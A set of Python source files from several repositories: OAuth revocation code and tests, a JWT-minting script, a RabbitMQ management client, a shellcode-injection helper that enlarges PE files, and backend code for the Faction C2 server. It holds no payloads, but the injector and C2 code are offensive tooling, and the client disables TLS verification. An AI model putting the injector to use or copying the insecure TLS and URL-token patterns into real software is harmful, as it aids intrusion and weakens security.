.. _RFC7009: https://tools.ietf.org/html/rfc7009
"""
#: Endpoint name to be registered
ENDPOINT_NAME = 'revocation'
def validate_endpoint_request(self):
"""The client constructs the request by including the following
parameters using the "application/x-www-form-urlencoded" format in
the HTTP request entity-body:
token
REQUIRED. The token that the client wants to get revoked.
token_type_hint
OPTIONAL. A hint about the type of the token submitted for
revocation.
"""
if self.request.body_params:
params = dict(self.request.body_params)
else:
params = dict(self.request.query_params)
if 'token' not in params:
raise InvalidRequestError()
token_type = params.get('token_type_hint')
if token_type and token_type not in self.SUPPORTED_TOKEN_TYPES:
raise UnsupportedTokenTypeError()
token = self.query_token(
params['token'], token_type, self.request.client)
if not token:
raise InvalidRequestError()
self.request.credential = token
def create_endpoint_response(self):
"""Validate revocation request and create the response for revocation.
For example, a client may request the revocation of a refresh token
with the following request::
POST /revoke HTTP/1.1
Host: server.example.com
Content-Type: application/x-www-form-urlencoded
Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW
token=45ghiukldjahdnhzdauz&token_type_hint=refresh_token
:returns: (status_code, body, headers)
"""
try:
# The authorization server first validates the client credentials
self.authenticate_endpoint_client()
# then verifies whether the token was issued to the client making
# the revocation request
self.validate_endpoint_request()
# the authorization server invalidates the token
self.revoke_token(self.request.credential)
self.server.send_signal(
'after_revoke_token',
token=self.request.credential,
client=self.request.client,
)
status = 200
body = {}
headers = [
('Content-Type', 'application/json'),
('Cache-Control', 'no-store'),
('Pragma', 'no-cache'),
]
except OAuth2Error as error:
status = error.status_code
body = dict(error.get_body())
headers = error.get_headers()
return status, body, headers
def query_token(self, token, token_type_hint, client):
"""Get the token from database/storage by the given token string.
Developers should implement this method::
def query_token(self, token, token_type_hint, client):
if token_type_hint == 'access_token':
return Token.query_by_access_token(token, client.client_id)
if token_type_hint == 'refresh_token':
return Token.query_by_refresh_token(token, client.client_id)
return Token.query_by_access_token(token, client.client_id) or \
Token.query_by_refresh_token(token, client.client_id)
"""
raise NotImplementedError()
def revoke_token(self, token):
"""Mark token as revoked. Since token MUST be unique, it would be
dangerous to delete it. Consider this situation:
1. Jane obtained a token XYZ
2. Jane revoked (deleted) token XYZ
3. Bob generated a new token XYZ
4. Jane can use XYZ to access Bob's resource
It would be secure to mark a token as revoked::
def revoke_token(self, token):
token.revoked = True
session.add(token)
session.commit()
"""
raise NotImplementedError()
```
#### File: django/test_oauth1/test_token_credentials.py
```python
import time
from authlib.specs.rfc5849 import signature
from tests.util import read_file_path, decode_response
from django.test import override_settings
from django.core.cache import cache
from .models import User, Client
from .oauth1_server import TestCase
class AuthorizationTest(TestCase):
def prepare_data(self):
user = User(username='foo')
user.save()
client = Client(
user_id=user.pk,
client_id='client',
client_secret='secret',
default_redirect_uri='https://a.b',
)
client.save()
def prepare_temporary_credential(self, server):
token = {
'oauth_token': 'abc',
'oauth_token_secret': 'abc-secret',
'oauth_verifier': 'abc-verifier',
'client_id': 'client',
'user_id': 1
}
key_prefix = server._temporary_credential_key_prefix
key = key_prefix + token['oauth_token']
cache.set(key, token, timeout=server._temporary_expires_in)
def test_invalid_token_request_parameters(self):
self.prepare_data()
server = self.create_server()
url = '/oauth/token'
# case 1
request = self.factory.post(url)
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'missing_required_parameter')
self.assertIn('oauth_consumer_key', data['error_description'])
# case 2
request = self.factory.post(url, data={'oauth_consumer_key': 'a'})
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'invalid_client')
# case 3
request = self.factory.post(url, data={'oauth_consumer_key': 'client'})
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'missing_required_parameter')
self.assertIn('oauth_token', data['error_description'])
# case 4
request = self.factory.post(url, data={
'oauth_consumer_key': 'client',
'oauth_token': 'a'
})
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'invalid_token')
def test_duplicated_oauth_parameters(self):
self.prepare_data()
server = self.create_server()
url = '/oauth/token?oauth_consumer_key=client'
request = self.factory.post(url, data={
'oauth_consumer_key': 'client',
'oauth_token': 'abc',
'oauth_verifier': 'abc'
})
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'duplicated_oauth_protocol_parameter')
@override_settings(
AUTHLIB_OAUTH1_PROVIDER={'signature_methods': ['PLAINTEXT']})
def test_plaintext_signature(self):
self.prepare_data()
server = self.create_server()
url = '/oauth/token'
# case 1: success
self.prepare_temporary_credential(server)
auth_header = (
'OAuth oauth_consumer_key="client",'
'oauth_signature_method="PLAINTEXT",'
'oauth_token="abc",'
'oauth_verifier="abc-verifier",'
'oauth_signature="secret&abc-secret"'
)
request = self.factory.post(url, HTTP_AUTHORIZATION=auth_header)
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertIn('oauth_token', data)
# case 2: invalid signature
self.prepare_temporary_credential(server)
request = self.factory.post(url, data={
'oauth_consumer_key': 'client',
'oauth_signature_method': 'PLAINTEXT',
'oauth_token': 'abc',
'oauth_verifier': 'abc-verifier',
'oauth_signature': 'invalid-signature'
})
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'invalid_signature')
def test_hmac_sha1_signature(self):
self.prepare_data()
server = self.create_server()
url = '/oauth/token'
params = [
('oauth_consumer_key', 'client'),
('oauth_token', 'abc'),
('oauth_verifier', 'abc-verifier'),
('oauth_signature_method', 'HMAC-SHA1'),
('oauth_timestamp', str(int(time.time()))),
('oauth_nonce', 'hmac-sha1-nonce'),
]
base_string = signature.construct_base_string(
'POST', 'http://testserver/oauth/token', params
)
sig = signature.hmac_sha1_signature(
base_string, 'secret', 'abc-secret')
params.append(('oauth_signature', sig))
auth_param = ','.join(['{}="{}"'.format(k, v) for k, v in params])
auth_header = 'OAuth ' + auth_param
# case 1: success
self.prepare_temporary_credential(server)
request = self.factory.post(url, HTTP_AUTHORIZATION=auth_header)
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertIn('oauth_token', data)
# case 2: exists nonce
self.prepare_temporary_credential(server)
request = self.factory.post(url, HTTP_AUTHORIZATION=auth_header)
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'invalid_nonce')
@override_settings(
AUTHLIB_OAUTH1_PROVIDER={'signature_methods': ['RSA-SHA1']})
def test_rsa_sha1_signature(self):
self.prepare_data()
server = self.create_server()
url = '/oauth/token'
self.prepare_temporary_credential(server)
params = [
('oauth_consumer_key', 'client'),
('oauth_token', 'abc'),
('oauth_verifier', 'abc-verifier'),
('oauth_signature_method', 'RSA-SHA1'),
('oauth_timestamp', str(int(time.time()))),
('oauth_nonce', 'rsa-sha1-nonce'),
]
base_string = signature.construct_base_string(
'POST', 'http://testserver/oauth/token', params
)
sig = signature.rsa_sha1_signature(
base_string, read_file_path('rsa_private.pem'))
params.append(('oauth_signature', sig))
auth_param = ','.join(['{}="{}"'.format(k, v) for k, v in params])
auth_header = 'OAuth ' + auth_param
request = self.factory.post(url, HTTP_AUTHORIZATION=auth_header)
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertIn('oauth_token', data)
# case: invalid signature
self.prepare_temporary_credential(server)
auth_param = auth_param.replace('rsa-sha1-nonce', 'alt-sha1-nonce')
auth_header = 'OAuth ' + auth_param
request = self.factory.post(url, HTTP_AUTHORIZATION=auth_header)
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'invalid_signature')
```
#### File: flask/test_oauth2/test_token_revocation.py
```python
from flask import json
from authlib.flask.oauth2.sqla import create_revocation_endpoint
from .models import db, User, Client, Token
from .oauth2_server import TestCase
from .oauth2_server import create_authorization_server
RevocationEndpoint = create_revocation_endpoint(db.session, Token)
class RevokeTokenTest(TestCase):
def prepare_data(self):
server = create_authorization_server(self.app)
server.register_endpoint(RevocationEndpoint)
user = User(username='foo')
db.session.add(user)
db.session.commit()
client = Client(
user_id=user.id,
client_id='revoke-client',
client_secret='revoke-secret',
redirect_uri='http://localhost/authorized',
scope='profile',
)
db.session.add(client)
db.session.commit()
def create_token(self):
token = Token(
user_id=1,
client_id='revoke-client',
token_type='bearer',
access_token='a1',
refresh_token='r1',
scope='profile',
expires_in=3600,
)
db.session.add(token)
db.session.commit()
def test_invalid_client(self):
self.prepare_data()
rv = self.client.post('/oauth/revoke')
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_client')
headers = {'Authorization': 'invalid token_string'}
rv = self.client.post('/oauth/revoke', headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_client')
headers = self.create_basic_header(
'invalid-client', 'revoke-secret'
)
rv = self.client.post('/oauth/revoke', headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_client')
headers = self.create_basic_header(
'revoke-client', 'invalid-secret'
)
rv = self.client.post('/oauth/revoke', headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_client')
def test_invalid_token(self):
self.prepare_data()
headers = self.create_basic_header(
'revoke-client', 'revoke-secret'
)
rv = self.client.post('/oauth/revoke', headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_request')
rv = self.client.post('/oauth/revoke', data={
'token': 'invalid-token',
}, headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_request')
rv = self.client.post('/oauth/revoke', data={
'token': 'a1',
'token_type_hint': 'unsupported_token_type',
}, headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'unsupported_token_type')
rv = self.client.post('/oauth/revoke', data={
'token': 'a1',
'token_type_hint': 'refresh_token',
}, headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_request')
def test_revoke_token_with_hint(self):
self.prepare_data()
self.create_token()
headers = self.create_basic_header(
'revoke-client', 'revoke-secret'
)
rv = self.client.post('/oauth/revoke', data={
'token': 'a1',
'token_type_hint': 'access_token',
}, headers=headers)
self.assertEqual(rv.status_code, 200)
rv = self.client.post('/oauth/revoke', data={
'token': 'a1',
'token_type_hint': 'access_token',
}, headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_request')
def test_revoke_token_without_hint(self):
self.prepare_data()
self.create_token()
headers = self.create_basic_header(
'revoke-client', 'revoke-secret'
)
rv = self.client.post('/oauth/revoke', data={
'token': 'a1',
}, headers=headers)
self.assertEqual(rv.status_code, 200)
``` |
{
"source": "3lpsy/boucan-compose",
"score": 3
} |
#### File: 3lpsy/boucan-compose/makejwt.py
```python
from datetime import timedelta, datetime
import argparse
import uuid
import sys
from os import environ
import jwt
if not getattr(jwt, "encode", None):
print(
"JWT Module does not have the 'encode' method. This is probably the wrong jwt module. You need pyjwt: pip install pyjwt"
)
sys.exit(1)
NODE_SCOPES = "profile dns-request:create dns-request:list http-request:create http-request:list zone:list zone:read refresh api-token:syncable"
def create_token(*, secret: str, data: dict, expire: datetime, hours: int = 24):
to_encode = data.copy()
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(to_encode, secret, algorithm="HS256")
return str(encoded_jwt.decode())
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-S",
"--secret",
action="store",
type=str,
help=f"api secret (alternative use API_SECRET environemnt variable)",
)
parser.add_argument(
"-u", "--user-id", action="store", default=1, type=str, help="user id (sub)"
)
parser.add_argument(
"-s",
"--scope",
action="append",
type=str,
help=f"scopes (default: {NODE_SCOPES})",
)
parser.add_argument(
"-d", "--days", action="store", default=30, type=int, help="days valid for"
)
parser.add_argument(
"-n",
"--server-name",
action="store",
type=str,
help="dns/http server name (aaa-bbb-ccc)",
)
parser.add_argument(
"-e",
"--exportformat",
action="store_true",
help="prints the commands to export HTTP_API_SECRET and DNS_API_SECRET",
)
args = parser.parse_args()
data = {"sub": args.user_id}
scopes = " ".join(args.scope) if len(args.scope or []) > 0 else NODE_SCOPES
data["scopes"] = scopes
server_name = args.server_name
if server_name:
data["dns_server_name"] = server_name
data["http_server_name"] = server_name
expires_delta = timedelta(days=args.days)
expires_at = datetime.utcnow() + expires_delta
secret = args.secret or environ.get("API_SECRET")
if not secret:
print(
"No secret provided using -S/--secret or API_SECRET. Please provide one that matches the server and try again"
)
sys.exit(1)
token = create_token(secret=secret, data=data, expire=expires_at,)
if args.exportformat:
print(f"export HTTP_API_TOKEN={str(token)}")
print(f"export DNS_API_TOKEN={str(token)}")
else:
print("TOKEN:{}".format(str(token)))
``` |
{
"source": "3lpsy/cottontail",
"score": 3
} |
#### File: cottontail/cottontail/rabbitmq_management.py
```python
try:
from urllib.parse import quote
except ImportError:
from urllib import quote
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class UnauthorizedAccessException(Exception):
"""Custom exception for HTTP 401"""
pass
class RabbitMQManagementClient(object):
"""rabbitmq-management HTTP API client.
Attributes:
host (str): server host
port (int, optional): servver port
username (str, optional): account's username
password (str, optional): account's password
"""
def __init__(self, host, port=15672, username="guest", password="<PASSWORD>",\
ssl=False):
"""Constructor
Note:
Do not include the `self` parameter in the ``Args`` section.
Args:
host (str): server host
port (int, optional): servver port
username (str, optional): account's username
password (str, optional): account's password
"""
self._host = host
self._port = port
self._username = username
self._password = password
self._scheme = "https" if ssl else "http"
def get_request(self, path):
"""Wrapper for GET requests to the API.
Args:
path (str): REST path appended to /api
Returns:
HTTP response JSON object.
Raises:
UnauthorizedException
"""
response = requests.get(
"{}://{}:{}/api/{}".format(self._scheme, self._host, self._port, path),
auth=(self._username, self._password),
verify=False,
timeout=5
)
if response.status_code == 200:
return response.json()
elif response.status_code == 401 or response.status_code == 403:
raise UnauthorizedAccessException(
"Authorization error: can't access /api/{}".format(path))
elif response.status_code == 404:
return None
else:
raise Exception("An error occured")
def post_request(self, path, data):
"""Wrapper for POST requests to the API
Args:
path (str): REST path appended to /api
data (object): POST body
Returns:
HTTP response JSON object
Raises:
UnauthorizedException
"""
response = requests.post(
"{}://{}:{}/api/{}".format(self._scheme, self._host, self._port, path),
auth=(self._username, self._password),
json=data,
verify=False
)
if response.status_code == 200:
return response.json()
elif response.status_code == 401 or response.status_code == 403:
raise UnauthorizedAccessException(
"Authorization error: can't access /api/{}".format(path))
else:
raise Exception("An error occured")
def get_amqp_listeners(self):
"""
Request the API for AMQP listeners.
"""
overview = self.get_overview()
return [l for l in overview["listeners"] if "amqp" in l["protocol"]]
def get_overview(self):
"""
Various random bits of information that describe the whole system.
"""
return self.get_request("overview")
def get_cluster_name(self):
"""
Name identifying this RabbitMQ cluster.
"""
return self.get_request("cluster-name")
def get_nodes(self):
"""
A list of nodes in the RabbitMQ cluster.
"""
return self.get_request("nodes")
def get_node(self, name, memory=False, binary=False):
"""
An individual node in the RabbitMQ cluster.
"""
return self.get_request("nodes/{}?memory={}&binary={}".format(
name, str(memory).lower(), str(binary).lower()))
def get_definitions(self, vhost=None):
"""
The server definitions - exchanges, queues, bindings, users,
virtual hosts, permissions and parameters.
Everything apart from messages.
"""
if vhost is not None:
return self.get_request("definitions/{}".format(
quote(vhost, safe='')))
return self.get_request("definitions")
def get_connections(self, vhost=None):
"""
A list of all open connections.
"""
if vhost is not None:
return self.get_request("vhosts/{}/connections".format(
quote(vhost, safe='')))
return self.get_request("connections")
def get_connection(self, name):
"""
An individual connection.
"""
return self.get_request("connections/{}".format(name))
def get_channels(self, vhost=None):
"""
A list of all open channels.
"""
if vhost is not None:
return self.get_request("vhosts/{}/channels".format(
quote(vhost, safe='')))
return self.get_request("channels")
def get_channel(self, name):
"""
Details about an individual channel.
"""
return self.get_request("channels/{}".format(name.replace(" ", "%20")))
def get_consumers(self, vhost=None):
"""
A list of all consumers (in a given vhosts).
"""
if vhost is not None:
return self.get_request("consumers/{}".format(
quote(vhost, safe='')))
return self.get_request("consumers")
def get_exchanges(self, vhost=None):
"""
A list of all exchanges (in a given vhost).
"""
if vhost is not None:
return self.get_request("exchanges/{}".format(
quote(vhost, safe='')))
return self.get_request("exchanges")
def get_exchange(self, vhost, name):
"""
An individual exchange.
"""
return self.get_request("exchanges/{}/{}".format(
quote(vhost, safe=''), name))
def get_queues(self, vhost=None):
"""
A list of all queues.
"""
if vhost is not None:
return self.get_request("queues/{}".format(quote(vhost, safe='')))
return self.get_request("queues")
def get_queue(self, vhost, name):
"""
An individual queue.
"""
return self.get_request("queue/{}/{}".format(vhost, name))
def get_messages(self, vhost, queue, count=10, requeue=True):
"""
Get messages currently stored in queue.
"""
return self.post_request(
"queues/{}/{}/get".format(quote(vhost, safe=''), queue),
{
"count": count,
"encoding": "auto",
"name": queue,
"requeue": str(requeue).lower(),
"vhost": vhost
}
)
def get_bindings(self, vhost=None):
"""
A list of all bindings (in a given virtual host).
"""
if vhost is not None:
return self.get_request("bindings/{}".format(
quote(vhost, safe='')))
return self.get_request("bindings")
def get_vhosts(self):
"""
A list of all vhosts.
"""
return self.get_request("vhosts")
def get_vhost(self, name):
"""
An individual virtual host.
"""
return self.get_request("vhosts/{}".format(quote(name, safe='')))
def get_permissions(self, name=None, username=None):
"""
A list of all permissions.
"""
if name is None:
return self.get_request("permissions")
else:
if username is None:
return self.get_request("permissions/{}".format(quote(name, safe='')))
else:
return self.get_request("permissions/{}/{}".format(
quote(name, safe=''), quote(username, safe='')))
def get_users(self):
"""
A list of all users.
"""
return self.get_request("users")
def get_user(self, name):
"""
An individual user.
"""
return self.get_request("users/{}".format(name))
def whoami(self):
"""
Details of the currently authenticated user.
"""
return self.get_request("whoami")
``` |
{
"source": "3lpsy/exutils",
"score": 3
} |
#### File: exutils/cli/expand.py
```python
import sys
from typing import List, Any
from argparse import ArgumentParser, Namespace, _SubParsersAction
from pathlib import Path
from os.path import join
from utils import shellcode_encoder
from cli.enums import SHELLCODE_HELP
from inject import Injector
def run(args: List[Any]):
# when only length is specified, shellcode is stubbed
injector = Injector(args["shellcode"], args["file"], args["output"], {})
injector.setup()
shellcode_size = injector.shellcode.get_final_size()
print("-- Expanding File --")
expanded_size = injector.output.expand_for_sc(
shellcode_size, injector.manager.file_alignment()
)
print(
f"[*] Finished: Output {injector.output} expanded by {shellcode_size} ({expanded_size} actual) bytes"
)
def apply(subparser: _SubParsersAction) -> ArgumentParser:
parser = subparser.add_parser("expand", help="expand binary (creates a copy)")
parser.add_argument("-s", "--shellcode", type=str, help=SHELLCODE_HELP)
parser.add_argument(
"-l",
"--length",
type=int,
help="instead of passing in shellcode, just pass in the length",
)
parser.add_argument(
"-f", "--file", type=str, help="path to source pe file", required=True
)
parser.add_argument(
"-o", "--output", type=str, help="path to newly created pe file"
)
parser.add_argument(
"-F",
"--force",
action="store_true",
help="force overwrite output",
default=False,
)
return parser
def normalize(args: Namespace) -> dict:
items = vars(args)
if args.shellcode:
items["shellcode"] = shellcode_encoder(items["shellcode"])
items["length"] = len(items["shellcode"])
elif args.length:
items["shellcode"] = b"\x00" * args.length
items["length"] = args.length
else:
print("[!] Please either pass in shellcode (-s) or length (-l)")
sys.exit(1)
p_file = Path(items["file"])
if not p_file.is_file():
print(f"[!] File not found at {items['file']}")
sys.exit(1)
items["file"] = p_file
if not args.output or Path(args.output).is_dir():
if Path(args.output).is_dir():
parent = args.output
else:
parent = p_file.parent
parts = p_file.name.split(".")
if len(parts) > 1:
output = (
"".join(parts[: len(parts) - 1]) + "-injected." + parts[len(parts) - 1]
)
else:
output = p_file.name + "-injected"
items["output"] = join(parent, output)
if items["output"] in ["stdout", "/proc/self/fd/1"]:
print("[!] Writing to stdout not supported")
sys.exit(1)
p_output = Path(items["output"])
if p_output.is_file() and not items["force"]:
print("[!] Output file already exists. Delete it or use '--force' to overwrite")
sys.exit(1)
items["output"] = p_output
return items
``` |
{
"source": "3lpsy/FactionAPI",
"score": 2
} |
#### File: apis/rest/error_message.py
```python
from flask import jsonify, request, send_file
from flask_restful import Resource, reqparse
from processing.user_role import authorized_groups
from processing.error_message import new_error_message, get_error_message
error_message_parser = reqparse.RequestParser()
error_message_parser.add_argument('Name')
error_message_parser.add_argument('Message')
class ErrorMessageEndpoint(Resource):
@authorized_groups(['StandardRead'])
def get(self, error_message_id='all'):
result = get_error_message(error_message_id)
if result['Success']:
return jsonify(result)
return jsonify(result, 400)
@authorized_groups(['StandardWrite'])
def post(self):
args = error_message_parser.parse_args()
result = new_error_message(args["Name"], args["Message"])
if result['Success']:
return jsonify(result)
return jsonify(result, 400)
```
#### File: FactionAPI/models/agent_type_version.py
```python
from backend.database import db
class AgentTypeVersion(db.Model):
__tablename__ = "AgentTypeVersion"
Id = db.Column(db.Integer, primary_key=True)
Name = db.Column(db.String)
AgentTypeId = db.Column(db.Integer, db.ForeignKey('AgentType.Id'), nullable=False)
Payloads = db.relationship('Payload', backref='AgentTypeVersion', lazy=True)
def __repr__(self):
if self.Name:
return '<AgentTypeVersion: %s>' % self.Name
else:
return '<AgentTypeVersion: %s>' % str(self.Id)
```
#### File: FactionAPI/models/error_message.py
```python
from backend.database import db
class ErrorMessage(db.Model):
__tablename__ = "ErrorMessage"
Id = db.Column(db.Integer, primary_key=True)
Source = db.Column(db.String)
Message = db.Column(db.String)
Details = db.Column(db.String)
Timestamp = db.Column(db.DateTime)
def __repr__(self):
return '<ErrorMessage: {0} - {1}>'.format(self.Source, self.Message)
```
#### File: FactionAPI/models/user.py
```python
import base64
import bcrypt
import pickle
from datetime import datetime
from flask import g
from flask.sessions import SecureCookieSessionInterface
from flask_login import user_loaded_from_header, user_loaded_from_request
from logger import log
from backend.database import db
from backend.cache import cache
from flask import jsonify
from flask_login import LoginManager
from models.api_key import ApiKey
from models.console_message import ConsoleMessage
login_manager = LoginManager()
class User(db.Model):
__tablename__ = "User"
Id = db.Column(db.Integer, primary_key=True)
Username = db.Column(db.String, unique=True)
Password = db.Column(db.LargeBinary)
RoleId = db.Column(db.Integer, db.ForeignKey('UserRole.Id'), nullable=False)
ApiKeys = db.relationship("ApiKey", backref='User', lazy=True)
Authenticated = db.Column(db.Boolean, default=False)
ConsoleMessages = db.relationship("ConsoleMessage", backref='User', lazy=True)
Files = db.relationship("FactionFile", backref='User', lazy=True)
Created = db.Column(db.DateTime)
LastLogin = db.Column(db.DateTime)
Enabled = db.Column(db.Boolean)
Visible = db.Column(db.Boolean)
def is_active(self):
"""True, as all users are active."""
return True
def get_id(self):
"""Return the email address to satisfy Flask-Login's requirements."""
return self.Username
def is_authenticated(self):
"""Return True if the user is authenticated."""
return self.Authenticated
def is_anonymous(self):
"""False, as anonymous users aren't supported."""
return False
def change_password(self, current_password, new_password):
log("change_password", "Got password change request")
if bcrypt.checkpw(current_password.encode('utf-8'), self.Password) and self.Enabled:
self.Password = bcrypt.hashpw(new_password.encode('utf-8'), bcrypt.gensalt())
db.session.add(self)
db.session.commit()
log("change_password", "<PASSWORD>")
return dict({
"Success": True,
"Message": 'Changed password for user: {0}'.format(self.Username)
})
log("change_password", "Current password incorrect")
return {
'Success':False,
'Message':'Invalid username or password.'
}
def get_api_keys(self):
api_keys = self.ApiKeys
log("get_api_keys", "Got api keys: {0}".format(str(api_keys)))
results = []
for api_key in api_keys:
result = dict()
result['Id'] = api_key.Id
result['Name'] = api_key.Name
result['Created'] = None
result['LastUsed'] = None
result['Type'] = api_key.Type
if api_key.Created:
result['Created'] = api_key.Created.isoformat()
if api_key.LastUsed:
result['LastUsed'] = api_key.LastUsed.isoformat()
results.append(result)
return {
'Success':True,
'Results':results
}
def delete_api_key(self, api_key_id):
api_keys = self.ApiKeys
for api_key in api_keys:
if api_key.Id == api_key_id:
db.session.delete(api_key)
db.session.commit()
return {
'Success':True,
'Message':"Api Key {0} deleted".format(api_key.Name)
}
return {
'Success':False,
'Message':"Api Key ID: {0} not found".format(api_key_id)
}
class ApiSessionInterface(SecureCookieSessionInterface):
# Taken from https://flask-login.readthedocs.io/en/latest/#disabling-session-cookie-for-apis
# I'm believe this is the proper way to do this since we're an API and don't care about
# session cookies.
def open_session(self, app, request):
s = self.get_signing_serializer(app)
if s is None:
return None
else:
return self.session_class()
def should_set_cookie(self, app, session):
return False
def save_session(self, *args, **kwargs):
log("user model", "save session called")
return
@login_manager.user_loader
def user_loader(user_id):
"""Given *user_id*, return the associated User object.
:param unicode user_id: user_id (email) user to retrieve
"""
log("user_loader", "Called for user_id: {0}".format(user_id))
"""Load user by ID from cache, if not in cache, then cache it."""
# make a unique cache key for each user
user_key = 'user_{}'.format(user_id)
# check if the user_object is cached
user_obj = pickle.loads(cache.get(user_key)) if cache.get(user_key) else None
if user_obj:
return user_obj
elif isinstance(user_id, int):
user = User.query.get(user_id)
user_obj = pickle.dumps(user)
cache.set(user_key, user_obj, timeout=3600)
return user
else:
user = User.query.filter_by(Username = user_id).first()
user_obj = pickle.dumps(user)
cache.set(user_key, user_obj, timeout=3600)
return user
@user_loaded_from_header.connect
def user_loaded_from_header(self, user=None):
log("user model", "User loaded from header")
g.login_via_header = True
@user_loaded_from_request.connect
def user_loaded_from_request(self, user=None):
log("user model", "User loaded from request")
g.login_via_request = True
@login_manager.request_loader
def load_user_from_request(request):
# next, try to login using Basic Auth
print('Trying API key lookup')
keyid = None
secret = None
try:
keyid = request.cookies['AccessKeyId']
secret = request.cookies['AccessSecret']
except:
pass
try:
auth_header = request.headers.get('Authorization')
auth_type, credentials = auth_header.split(' ')
decoded_header = base64.b64decode(credentials).decode("utf-8")
keyid, secret = decoded_header.split(':')
except:
pass
try:
token = request.args.get('token')
keyid, secret = token.split(':')
except:
pass
if secret and keyid:
print('Got API KEY: {0}'.format(keyid))
apiKey = ApiKey.query.filter_by(Name=keyid).first()
if apiKey and apiKey.Enabled:
if bcrypt.checkpw(secret.encode('utf-8'), apiKey.Key):
print('Returning User with Id: {0}'.format(str(apiKey.UserId)))
apiKey.LastUsed = datetime.utcnow()
db.session.add(apiKey)
user = User.query.get(apiKey.UserId)
user.LastLogin = datetime.utcnow()
db.session.add(user)
db.session.commit()
return user
db.session.remove()
else:
print('Invalid API Key or Secret')
db.session.remove()
# finally, return None if both methods did not login the user
db.session.remove()
return None
```
#### File: FactionAPI/processing/console_message.py
```python
from datetime import datetime
import json
import re
from flask_login import current_user
from models.console_message import ConsoleMessage
from models.agent import Agent
from models.agent_task import AgentTask
from models.user import User
from backend.rabbitmq import rabbit_producer
from processing.faction_file import get_faction_file_bytes
from logger import log
def console_message_json(message):
if (message.UserId):
user = User.query.get(message.UserId)
username = user.Username
elif (message.AgentId):
agent = Agent.query.get(message.AgentId)
username = agent.Name
else:
username = None
result = dict(
{
'AgentId': message.AgentId,
'UserId': message.UserId,
'Username' : username,
'Content' : message.Content,
'Display': message.Display,
'Type': message.Type,
'Received' : message.Received.isoformat()
})
return result
def new_console_message(agent_id, content):
filenames = re.findall("(f2:files/[^\s]+)", content)
display = content
if len(filenames) > 0:
for filename in filenames:
name = filename.replace("f2:files/","")
log("new_console_message", "getting bytes for file {0}".format(name))
result = get_faction_file_bytes(name)
if result['Success']:
content = content.replace(filename, result['Message'])
else:
return dict({
'Success': False,
'Message': 'Could not find file: {0}'.format(filename)
})
console_message = {
"AgentId": agent_id,
"UserId": current_user.Id,
"Content": content,
"Display": display
}
log("add_message", "publishing message: {0}".format(console_message))
rabbit_producer.send_request('NewConsoleMessage', console_message)
return console_message
def get_console_message(console_message_id):
if console_message_id == 'all':
result = []
console_messages = ConsoleMessage.query.all()
for console_message in console_messages:
result.append(console_message_json(console_message))
else:
console_message = ConsoleMessage.query.get(console_message_id)
result = console_message_json(console_message)
return result
def get_console_messages_by_agent(agent_id):
agent = Agent.query.get(agent_id)
if agent:
console_messages = ConsoleMessage.query.filter_by(AgentId=agent_id)
results = []
for message in console_messages:
results.append(console_message_json(message))
return {
"Success": True,
"Results": results
}
else:
return {
"Success": False,
"Message": "No agent found with id: {0}".format(agent_id)
}
def get_console_message_by_task(agent_task_id):
task = AgentTask.query.get(agent_task_id)
if task:
console_messages = ConsoleMessage.query.filter_by(AgentTaskId=agent_task_id)
results = []
if console_messages.count() > 0:
log("get_console_message_by_task", "Got count. Going.")
for message in console_messages:
log("get_console_message_by_task", "Working on: {0}".format(message))
results.append(console_message_json(message))
return {
"Success": True,
"Results": results
}
else:
return {
"Success": False,
"Message": "No agent found with id: {0}".format(agent_task_id)
}
``` |
{
"source": "3lpsy/jubilant-market",
"score": 2
} |
#### File: jubilant-market/PythonServer/wsgi.py
```python
from flask import Flask, request, jsonify, url_for, Blueprint, render_template, send_from_directory, current_app, session
from flask_restful import Api, Resource, reqparse, abort
from web3 import Web3
from decouple import config
from flask_cors import CORS, cross_origin
# Initilize Flask App
# Each Api call is for the functionality of the React Front
# Or for initilizating Solidity SmartContract
app = Flask(__name__)
cors = CORS(app)
api = Api(app)
# functions
def abort_if_useraddr_doesnt_exist(userAddress):
if userAddress not in users:
abort(404, message=" Could not find userAddress")
def abort_if_userAddr_exists(userAddress):
if userAddress in users:
abort(409, message="UserAddress already exist")
# MetaMask Chain Id
# # Hex Decimal Network
# 0x1 1 Ethereum Main Network (Mainnet)
# 0x3 3 Ropsten Test Network
# 0x4 4 Rinkeby Test Network
# 0x5 5 Goerli Test Network
# 0x2a 42 Kovan Test Network
user_put_args = reqparse.RequestParser()
user_put_args.add_argument("userAddress", type=str, help="UserAddress Require", required=True)
user_put_args.add_argument("account_total", type=int, help="account_total Require", required=True)
user_put_args.add_argument("latest_month", type=int, help="latest_month Require", required=True)
# Data in memory
names = {
"tim": {"age":19, "gender":"male"},
"bill": {"age":70, "gender":"male"}
}
# UserData
# 0x0080 is the userAddr
mockuserdata = {
# "status": "success",
"0x0080":
{
"userAddress": "0x0080",
"account_total":700,
"latest_month":9
},
# "message": "Successfully! All records has been fetched."
}
users = {}
# return JSON serializable objects
